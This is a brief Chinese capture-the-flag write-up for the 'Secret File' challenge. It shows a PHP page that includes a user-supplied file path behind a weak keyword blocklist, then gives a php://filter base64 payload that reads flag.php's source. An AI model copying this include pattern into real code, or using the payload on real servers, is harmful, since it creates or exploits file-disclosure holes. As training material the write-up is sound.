# \[极客大挑战 2019]Secret File

## \[极客大挑战 2019]Secret File

## 考点

* 文件包含配合伪协议读取文件
* http

## wp

抓包发现隐藏的链接Archive\_room.php，访问发现新的链接action.php，接着抓包

![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2FAV3Bku54ruiLadjZZFab%2Fimage.png?alt=media\&token=b5bc3f7f-b0f3-4bbe-9b9c-de964303a561)

访问secr3t.php

```php
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
```

访问`secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php`即可